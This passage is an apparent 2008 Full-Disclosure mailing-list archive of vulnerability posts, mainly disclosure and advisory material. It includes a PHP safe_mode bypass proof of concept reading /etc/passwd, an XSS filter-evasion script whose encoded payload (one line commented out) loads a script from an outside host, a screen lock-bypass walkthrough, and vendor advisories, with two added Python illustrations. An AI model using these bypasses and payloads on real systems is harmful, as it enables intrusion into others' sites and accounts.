IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as the main safety measure.

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-END PGP SIGNATURE-



[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

2008-06-18 Thread Maksymilian Arciemowicz

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54

CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

posix_access - Determine accessibility of a file

SYNOPSIS:

bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's look at the posix_access() function:

- ---
PHP_FUNCTION(posix_access)
{
    long mode = 0;
    int filename_len, ret;
    char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename,
            &filename_len, &mode) == FAILURE) {
        RETURN_FALSE;
    }

    /* the path that access() will actually receive */
    path = expand_filepath(filename, NULL TSRMLS_CC);

    if (!path) {
        POSIX_G(last_error) = EIO;
        RETURN_FALSE;
    }

    /* open_basedir is checked on path, but the safe_mode uid check
       is run on the unexpanded filename */
    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
            (PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
            CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
        efree(path);
        POSIX_G(last_error) = EPERM;
        RETURN_FALSE;
    }

    ret = access(path, mode);
    efree(path);

    if (ret) {
        POSIX_G(last_error) = errno;
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
- ---

var_dump(posix_access("http://../../../etc/passwd"))==True
var_dump(posix_access("/etc/passwd"))==False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); will change
"http://../../../etc/passwd" to path=/etc/passwd.

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check the real (unexpanded)
path "http://../../../etc/passwd". The http:// prefix is honoured in php_checkuid_ex(),
which ignores such paths, so safe_mode is bypassed.
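The same check-versus-use mismatch explains the chdir() examples earlier and this posix_access() case. As an added illustration (not PHP's source code), the Python model below imitates the two steps the advisory describes, expand_filepath() resolving the string relative to the script directory and the safe_mode ownership check ignoring anything with an http:// prefix, and then shows the corrected order, checking the same expanded path the syscall will use. The ownership table, the script directory /www and uid 80 are constructed values taken from the warnings above.

```python
import posixpath

SCRIPT_DIR = "/www"   # constructed: directory of the running script
SCRIPT_UID = 80       # constructed: uid the script runs as
# constructed ownership table standing in for stat() results
OWNER = {"/www": 80, "/www/wufff.php": 80, "/etc": 0, "/etc/passwd": 0}


def expand_filepath(filename):
    """Imitates expand_filepath(): a relative name is joined to the script
    directory and the '..' components are collapsed, so "http://" is just a
    directory called "http:" followed by an empty component."""
    if not filename.startswith("/"):
        filename = posixpath.join(SCRIPT_DIR, filename)
    return posixpath.normpath(filename)


def owner_ok(path):
    """CHECKUID_CHECK_FILE_AND_DIR: compare the owner of the file, or of
    its directory when the file does not exist, with the script uid."""
    owner = OWNER.get(path)
    if owner is None:
        owner = OWNER.get(posixpath.dirname(path))
    return owner == SCRIPT_UID


def checkuid_5_2_6(filename):
    """Imitates the safe_mode check on the *unexpanded* string: a name
    carrying a URL scheme is skipped, as the advisory observes."""
    if "://" in filename:
        return True
    return owner_ok(expand_filepath(filename))


def posix_access_5_2_6(filename):
    """Vulnerable order: the check runs on filename, the syscall on path."""
    path = expand_filepath(filename)
    if not checkuid_5_2_6(filename):
        return False
    return path in OWNER          # stands in for access(path, mode) == 0


def posix_access_fixed(filename):
    """Corrected order: the ownership check runs on the expanded path,
    i.e. on exactly the value that access() will receive."""
    path = expand_filepath(filename)
    if not owner_ok(path):
        return False
    return path in OWNER


if __name__ == "__main__":
    for name in ("http://../../../etc/passwd", "/etc/passwd", "/www/wufff.php"):
        print(name, "->", expand_filepath(name),
              "5.2.6:", posix_access_5_2_6(name),
              "fixed:", posix_access_fixed(name))
```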

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 2. How to Fix ---
Do not use safe_mode as the main safety mechanism.

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



Re: [Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Thomas Pollet
Hello,

so,

with (String) { eval(fromCharCode( /* insert charcodes here */ ) )}

is what I needed

Regards,
Thomas Pollet

2008/6/18 Thomas Pollet <[EMAIL PROTECTED]>:
> Hello,
>
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?
>
> function write(str){
>//document.write() doesn't work as it becomes document_write()
>var s = /write/;
>var w = String();
>var n = String();
>w += s;
>//cast to string so we can index
>w += s;
>n += w[1] + w[2] + w[3] + w[4] + w[5];
>//call document['write']
>document[n](str);
> }
> var s = /fromCharCode/;
> var w = String();
> var n = String();
> w += s;
> n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
> w[11] + w[12];
>
> write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
> 62,104,60,47,97,62));
>
> /*
> write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
> ,111,109,34,62));
> */
>
> Regards,
> Thomas Pollet
>



Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread A . L . M . Buxey
Hi,

> There are actually studies going on RIGHT NOW to see if phones can be 
> allowed to be used during flights by the FCC/FAA, and in other countries as 
> well.

Several European carriers now allow mobiles to be used in flight. I'm
bothered more by the person inanely chatting during the flight than by
security issues; hopefully the hold luggage has been properly scanned
anyway, or a dumb timer would do just as well as a mobile.

PS: lots of people don't turn their phones off. Lots of people talk
on their phones before going through customs, etc.

alan



Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread Ureleet
On Wed, Jun 18, 2008 at 12:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.
>

do u make money from saying his name?  you use it in enuff of ur emails.

joel - ignore him.



Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread Joel Esler

On Jun 18, 2008, at 12:26 PM, n3td3v wrote:

> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.

First of all, I said "before I got the iPhone with the 'airplane'
mode" I'd forget to turn off my phone a lot, I'd throw it in my
briefcase when I'd go through security, and forget it's in there.
Heck, I've seen people actually being able to receive calls on their
crackberries while in mid flight.  Not that they answered them.  But
I've seen the phones ring.  I have an iPhone now, I place it in
airplane mode when I get on a flight.

There are actually studies going on RIGHT NOW to see if phones can be
allowed to be used during flights by the FCC/FAA, and in other
countries as well.

Personally I hope this doesn't go through, as I don't want to be
sitting next to some dude during my 100,000+ miles I fly a year to
hear yacking the whole flight.

> Is this some kind of dry American humour that I'm missing here or is
> that not even funny?

Yes, it was a joke.  Sorry if it was in bad taste.

--
Joel Esler
  [EMAIL PROTECTED]
  http://blog.joelesler.net
[m]




[Full-disclosure] Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service

2008-06-18 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo
 Frame Denial of Service

Advisory ID: cisco-sa-20080618-ips


Revision 1.0

For Public Release 2008 June 18 1600 UTC (GMT)

+-

Summary
=======

Cisco Intrusion Prevention System (IPS) platforms that have gigabit
network interfaces installed and are deployed in inline mode contain
a denial of service vulnerability in the handling of jumbo Ethernet
frames. This vulnerability may lead to a kernel panic that requires a
power cycle to recover platform operation. Platforms deployed in
promiscuous mode only or that do not contain gigabit network
interfaces are not vulnerable.

Cisco has released free software updates that address this
vulnerability. There is a workaround for this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080618-ips.shtml.

Affected Products
=================

Vulnerable Products
+------------------

The following Cisco IPS versions are affected:

  * Cisco Intrusion Prevention System version 5.x prior to 5.1(8)E2
  * Cisco Intrusion Prevention System version 6.x prior to 6.0(5)E2

The following Cisco IPS platforms ship with gigabit network
interfaces and are vulnerable if they are deployed in inline mode:

  * 4235
  * 4240
  * 4250
  * 4250SX *
  * 4250TX
  * 4250XL *
  * 4255
  * 4260
  * 4270

* The 4250SX and 4250XL models ship with gigabit network interfaces
that are normally used for remote administration and monitoring. If
the gigabit network interfaces are configured for use with inline
mode, the platform is vulnerable.

To determine the version of software that is running on a Cisco IPS
platform, log into the platform using the console or Secure Shell
(SSH) and issue the show version command.

sensor# show version 
Application Partition:

Cisco Intrusion Prevention System, Version 6.0(4a)E1

To determine whether a Cisco IPS platform has interfaces configured
for inline mode, log into the platform using the console or SSH and
issue the show interfaces command. Look for paired interfaces in the
Inline Mode statement of the command output.

sensor# show interfaces
...
MAC statistics from interface GigabitEthernet0/1
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/0
...
MAC statistics from interface GigabitEthernet0/0
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/1
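As an added example, not part of Cisco's advisory, the Python below applies the two tests just described to captured command output: it parses the version string, compares it against the fixed releases (5.1(8)E2 and 6.0(5)E2, with 6.1(1) outside the affected trains), and looks for GigabitEthernet interfaces reporting an inline pairing. The version-string pattern and the sample output (constructed from the excerpts above) are assumptions about the command format.

```python
import re

# Fixed releases named in the advisory: 5.x before 5.1(8)E2 and
# 6.x before 6.0(5)E2 are affected.  Tuples compare lexicographically:
# (major, minor, maintenance, maintenance letter, engine level).
FIXED_IN = {5: (5, 1, 8, "", 2), 6: (6, 0, 5, "", 2)}

# Assumed format of the 'show version' line, e.g. "Version 6.0(4a)E1"
VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\((\d+)([a-z]?)\)E(\d+)")

# Constructed sample output, following the advisory's excerpts.
SAMPLE_SHOW_VERSION = """\
sensor# show version
Application Partition:

Cisco Intrusion Prevention System, Version 6.0(4a)E1
"""

SAMPLE_SHOW_INTERFACES = """\
sensor# show interfaces
MAC statistics from interface GigabitEthernet0/1
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/0
MAC statistics from interface GigabitEthernet0/0
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/1
"""


def parse_version(show_version):
    """Turn 'Version 6.0(4a)E1' into (6, 0, 4, 'a', 1); None if absent."""
    m = VERSION_RE.search(show_version)
    if m is None:
        return None
    major, minor, maint, letter, engine = m.groups()
    return (int(major), int(minor), int(maint), letter, int(engine))


def version_is_affected(version):
    """Affected only in the 5.x and 6.x trains, below the fixed release."""
    if version is None:
        return False
    fixed = FIXED_IN.get(version[0])
    return fixed is not None and version < fixed


def inline_gigabit_pairs(show_interfaces):
    """(interface, partner) for every GigabitEthernet interface whose
    'Inline Mode' statement reports a pairing."""
    pairs = []
    current = None
    for raw in show_interfaces.splitlines():
        line = raw.strip()
        m = re.match(r"MAC statistics from interface (\S+)$", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"Inline Mode = Paired with interface (\S+)$", line)
        if m and current is not None and current.startswith("GigabitEthernet"):
            pairs.append((current, m.group(1)))
    return pairs


def sensor_is_vulnerable(show_version, show_interfaces):
    """Both conditions from the advisory: affected version AND an inline
    pairing on a gigabit interface.  Promiscuous-only sensors report no
    pairing and therefore come back False."""
    return (version_is_affected(parse_version(show_version))
            and bool(inline_gigabit_pairs(show_interfaces)))


if __name__ == "__main__":
    print("version:", parse_version(SAMPLE_SHOW_VERSION))
    print("inline gigabit pairs:", inline_gigabit_pairs(SAMPLE_SHOW_INTERFACES))
    print("vulnerable:", sensor_is_vulnerable(SAMPLE_SHOW_VERSION,
                                              SAMPLE_SHOW_INTERFACES))
```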

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco IPS platforms are not vulnerable:

  * 4210
  * 4215
  * SSM-AIP10
  * SSM-AIP20
  * SSM-AIP40
  * AIM-IPS
  * NM-CIDS
  * IDSM2

Cisco IPS version 6.1(1) is not vulnerable. Cisco IOS with the
Intrusion Prevention System feature is not vulnerable. No other Cisco
products are currently known to be affected by this vulnerability.

Details
=======

Certain Cisco IPS platforms contain a denial of service vulnerability
in the handling of jumbo Ethernet frames. When a specific series of
jumbo Ethernet frames is received on a gigabit network interface of a
vulnerable Cisco IPS platform that is deployed in inline mode, a
kernel panic may occur that results in the complete failure of the
platform and causes a network denial of service condition. Cisco IPS
platforms that are deployed in promiscuous mode only or that do not
contain gigabit network interfaces are not vulnerable.

Jumbo Ethernet support is usually deployed in data center
environments to increase inter-server communication performance and
is not a default configuration for Cisco routers and switches.
Support for jumbo Ethernet frames must be enabled on each device that
requires the feature. In order to exploit this vulnerability, an
attacker must be able to inject jumbo Ethernet frames to a vulnerable
Cisco IPS platform that is deployed in inline mode.

If they are configured to use bypass mode to allow traffic to pass in
the event of a system failure, all Cisco IPS platforms will fail to
forward traffic except for the 4260 and 4270 platforms. The Cisco IPS
4260 and 4270 platforms contain a hardware bypass feature that allows
them to pass network traffic in the event of a kernel panic or power
outage. They will pass traffic by default if the hardware bypass
feature is engaged.

This vulnerability is documented in Cisco Bug ID CSCso64762 and has
been assigned Common Vulnerabilities and Exposures (CVE) ID 
CVE-2008-2060.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this

[Full-disclosure] Joel Esler comment on Sans ISC podcast

2008-06-18 Thread n3td3v
Joel Esler said he doesn't switch his phone off on flights and that
anyone who is on a plane with him should watch out.

Is this some kind of dry American humour that I'm missing here or is
that not even funny?

I'm asking the TSA to listen to his comments made in audio format and
decide if this individual should be banned from flying.

http://isc.sans.org/diary.html?storyid=4568

All the best,

n3td3v



[Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Thomas Pollet
Hello,

I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?

function write(str){
   //document.write() doesn't work as it becomes document_write()
   var s = /write/;
   var w = String();
   var n = String();
   w += s;
   //cast to string so we can index
   w += s;
   n += w[1] + w[2] + w[3] + w[4] + w[5];
   //call document['write']
   document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
w[11] + w[12];

write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));

/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/

Regards,
Thomas Pollet

[Full-disclosure] Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities

2008-06-18 Thread Secunia Research
==

 Secunia Research 18/06/2008

   - TorrentTrader Multiple SQL Injection Vulnerabilities -

==
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

==
1) Affected Software

* TorrentTrader 1.08 Classic Edition downloaded before 2008-06-17

NOTE: Other versions may also be affected.

==
2) Severity

Rating: Moderately Critical
Impact: Exposure of sensitive information
        Manipulation of data
Where:  Remote

==
3) Vendor's Description of Software

"TorrentTrader is a feature packed and highly customisable PHP/MySQL
Based BitTorrent tracker. Featuring integrated forums, and plenty
of administration options."

Product Link:
http://www.torrenttrader.org/

==
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in TorrentTrader,
which can be exploited by malicious people and malicious users to
conduct SQL injection attacks.

1) Input passed to the "email" and "wantusername" parameters in
account-signup.php is not properly sanitised before being used in SQL
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Successful exploitation of this vulnerability allows e.g. retrieval of
administrator password hashes, but requires that "magic_quotes_gpc" is
disabled and that the site is not configured as invite-only.

2) Input passed to the "receiver" parameter in account-inbox.php (when
"msg" is set) is not properly sanitised before being used in SQL
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Successful exploitation of this vulnerability requires valid user
credentials and that "magic_quotes_gpc" is disabled.

==
5) Solution

Update to TorrentTrader 1.08 Classic Edition downloaded on 2008-06-17
or later.

==
6) Time Table

10/06/2008: Contacted the vendor.
17/06/2008: Contacted the vendor again.
17/06/2008: Vendor asks for PoC.
17/06/2008: Sent PoC to the vendor.
17/06/2008: Vendor releases a fixed version.
18/06/2008: Public disclosure.

==
7) Credits

Discovered by Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2428 for the vulnerabilities.

==
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-15/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored

2008-06-18 Thread carl hardwick
These protocol-handler security settings are ignored although they're
set to 'true', and no warnings are shown:

network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews
(in about:config)

For example,
I set network.protocol-handler.warn-external.mailto to 'true', clicked
on an e-mail link and Windows Mail is launched without any warnings
(tested on Firefox 3.0 on Windows Vista SP1)



[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)

2008-06-18 Thread rembrandt
Well, I improved the advisory I released a while ago after I found several
websites which claim that this is a fake/myth sec. problem because they
were not able to reproduce it on their boxes...

The updated version is available at milw0rm (thanks to str0ke) and I
recommend that all who mirrored the article do update.

milw0rm link:
http://www.milw0rm.com/exploits/4028

I even included a lil example to make it fool proof... I was really
impressed that some do think it's a fake/myth and claim that on their
website.

So it would be nice if the guys at osvdb.org (and others) would update
their articles, rating and whatever else matters for them to correct their
statements.

I named an OS now and how to reproduce it.
So feel free to install oBSD in a VM. ;]

The new version of the "improved" advisory is attached too for your
convenience. The bug itself is still the old one.


Kind regards,
Rembrandt _   _ _ _ ___ _ _   _
   / / / / / /   /  _/_  __/ / / /
  / /_/ / __/ / // /  / / / /_/ /
 / __  / /___/ // /  / / / __  /
/_/ /_/_/_/___/ /_/ /_/ /_/
   Helith - 0815


Author: Rembrandt
Date  : Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS  : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not find an advisory related to this so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But due to the nature of the behavior of screen and OpenBSD it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password: 
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven   (Attached)
25144.ttyC1.raven   (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$ 

Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.

Of course this also works if you get access to an SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which do report this is a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!


Kind regards,
Rembrandt

[Full-disclosure] The Extended HTML Form attack revisited

2008-06-18 Thread Sandro Gauci
Hi -

Back in 2002 I had published details of a vulnerability affecting most
web browsers. It detailed a security flaw that allows attackers to
abuse non-HTTP protocols to launch Cross Site Scripting attacks even
when a target web application was not vulnerable to XSS.

Six years later I'm releasing an update to this research in this
paper. This security vulnerability still affects popular web browsers
nowadays and the following browsers were tested as vulnerable:

   * Internet Explorer 6
   * Internet Explorer 7
   * Internet Explorer 8 (beta 1)
   * Opera 9.27
   * Opera 9.50
   * Safari 1.32
   * Safari 3.1.1

Others have described how to abuse this behavior for purposes other than
Cross Site Scripting. NGSSoftware previously published a paper called
"Inter-Protocol Exploitation" which references the original EyeonSecurity paper.

Paper at:
http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf

or http://tinyurl.com/5d88ll

--
Sandro Gauci
EnableSecurity
Web: http://enablesecurity.com/



[Full-disclosure] CA ARCserve Backup Discovery Service Denial of Service Vulnerability

2008-06-18 Thread Williams, James K

Title: CA ARCserve Backup Discovery Service Denial of Service 
Vulnerability


CA Advisory Date: 2008-06-17


Reported By: Luigi Auriemma


Impact: A remote attacker can cause a denial of service.


Summary: CA ARCserve Backup contains a vulnerability in the 
Discovery service (casdscsvc) that can allow a remote attacker to 
cause a denial of service condition. CA has issued patches to 
address the vulnerability. The vulnerability, CVE-2008-1979, 
occurs due to insufficient verification of client data. An 
attacker can make a request that can crash the service.


Mitigating Factors: None


Severity: CA has given this vulnerability a Medium risk rating.


Affected Products:
CA ARCserve Backup r12.0 Windows
CA ARCserve Backup r11.5 Windows SP3 and prior*
CA ARCserve Backup r11.1 Windows*
CA ARCserve Backup r11.1 Netware*
CA Server Protection Suite r2
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server 
   Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server 
   Premium Edition r2

*Formerly known as BrightStor ARCserve Backup


Non-affected Products:
CA ARCserve Backup r11.5 Windows SP4


Affected Platforms:
Windows and Netware


Status and Recommendation:
CA has issued the following patches to address the 
vulnerabilities. 
CA ARCserve Backup r12.0 Windows: QO99574
CA ARCserve Backup r11.5 Windows: QO99575
For CA ARCserve Backup r11.5 Windows, the issue can also be 
addressed by applying 11.5 SP4: QO99129
CA ARCserve Backup r11.1 Windows: QO99576
CA ARCserve Backup r11.1 Netware: QO99579
CA Protection Suites r2: QO99575


How to determine if you are affected:

CA ARCserve Backup r12.0 Windows:

1. Run the ARCserve Patch Management utility. From the Windows 
   Start menu, it can be found under Programs->CA->ARCserve Patch 
   Management->Patch Status.
2. The main patch status screen will indicate if patch “QO99574” 
   is currently applied. If the patch is not applied, the 
   installation is vulnerable.

For more information on the ARCserve Patch Management utility, 
read document TEC446265.

Alternatively, use the file information below to determine if the 
product installation is vulnerable.

CA ARCserve Backup r12.0 Windows,
CA ARCserve Backup r11.5 Windows,
CA ARCserve Backup r11.1 Windows,
CA ARCserve Backup r11.1 Netware,
CA Protection Suites r2*:

1. Using Windows Explorer, locate the file “asbrdcst.dll”. By 
   default, the file is located in the 
   “C:\Program Files\CA\SharedComponents\ARCserve Backup\CADS” 
   directory on 32 bit systems and “C:\Program Files (x86)\CA\
   SharedComponents\ARCserve Backup\CADS” on 64 bit systems.
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the below 
   table, the installation is vulnerable.

* For Protection Suites r2, use the file timestamp for CA ARCserve 
  Backup r11.5 English

Product Ver   Product Lang  File Name     File Sz  Timestamp
                                          (bytes)
12.0 Windows  English       asbrdcst.dll  324872   05/01/2008 12:11
12.0 Windows  Spanish       asbrdcst.dll  324872   05/01/2008 12:11
12.0 Windows  Port-Braz     asbrdcst.dll  320776   05/01/2008 12:11
12.0 Windows  Japanese      asbrdcst.dll  320776   05/01/2008 12:11
12.0 Windows  Italian       asbrdcst.dll  324872   05/01/2008 12:11
12.0 Windows  German        asbrdcst.dll  324872   05/01/2008 12:11
12.0 Windows  French        asbrdcst.dll  324872   05/01/2008 12:11
12.0 Windows  Trad Chinese  asbrdcst.dll  316680   05/01/2008 12:11
12.0 Windows  Simp Chinese  asbrdcst.dll  316680   05/01/2008 12:11
11.5 Windows  English       asbrdcst.dll  212992   04/22/2008 10:15:02
11.5 Windows  Japanese      asbrdcst.dll  208896   04/22/2008 14:28:52
11.5 Windows  Simp Chinese  asbrdcst.dll  204800   04/22/2008 14:30:54
11.5 Windows  Trad Chinese  asbrdcst.dll  204800   04/22/2008 14:33:28
11.5 Windows  Italian       asbrdcst.dll  212992   04/22/2008 14:31:46
11.5 Windows  Port-Braz     asbrdcst.dll  212992   04/22/2008 14:53:54
11.5 Windows  German        asbrdcst.dll  212992   04/22/2008 14:27:48
11.5 Windows  French        asbrdcst.dll  212992   04/22/2008 14:26:54
11.5 Windows  Spanish       asbrdcst.dll  212992   04/22/2008 14:32:38
11.1 Windows  English       asbrdcst.dll  204800   04/24/2008 11:21:26
11.1 Windows  Japanese      asbrdcst.dll  200704   04/24/2008 11:25:48
11.1 Windows  Simp Chinese  asbrdcst.dll  196608   04/24/2008 11:27:44
11.1 Windows  Trad Chinese  asbrdcst.dll  196608   04/24/2008 11:30:32
11.1 Windows  Italian       asbrdcst.dll  204800   04/24/2008 11:28:38
11.1 Windows  Port-Braz     asbrdcst.dll  204800   04/24/2008 11:38:52
11.1 Windows  German        asbrdcst.dll  204800   04/24/2008 11:24:38
11.1 Windows  French        asbrdcst.dll  204800   04/24/2008 11:23:38
11.1 Windows  Spanish       asbrdcst.dll  204800   04/24/2008 11:29:34
11.1 Windows  Dutch         asbrdcst.dl

[Full-disclosure] Announcement && CFP: ISOI 5, Tallinn Estonia

2008-06-18 Thread Gadi Evron
The Internet Security Operations and Intelligence (ISOI) 5th workshop will
take place on the 11th and 12th of September, 2008.

Venue: Tallinn, Estonia.
Host: Estonian CERT (www.cert.ee).

Attendance:
While payment is not required, to attend you must be a member of one of 
the vetted operational communities, or contact us directly for special 
consideration.

CFP information:
The topics for the CFP include operational nsp security, Internet 
incident response, Internet fraud, cyber crime investigations and general 
case studies.

You can email your suggestions, including a title, short abstract and
preferred day and time to me personally up to the 28th of July. Late
submissions for turbo-talks are possible.

For more information you can check out the web pages for previous ISOI 
workshops:

Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html

A preliminary program will become available in a few weeks on:
http://isotf.org/isoi5.html

Gadi Evron && Randy Vaughn.



[Full-disclosure] Skype chat encryption with OTR

2008-06-18 Thread Fabio Pietrosanti (naif)
For all you OS X guys that like Skype because of its usability but are
concerned about the lack of an end-to-end message encryption system (a
plug-in for Skype).

Today I tried:

#1 Get and install Adium (I suggest portable Adium in a separate
FileVault volume)
http://www.freesmug.org/portableapps/adium/

#2 Get and install the Skype plug-in for Adium
 http://myjobspace.co.nz/images/pidgin/

#3 Enable OTR encryption on Skype chat (through the Adium client)
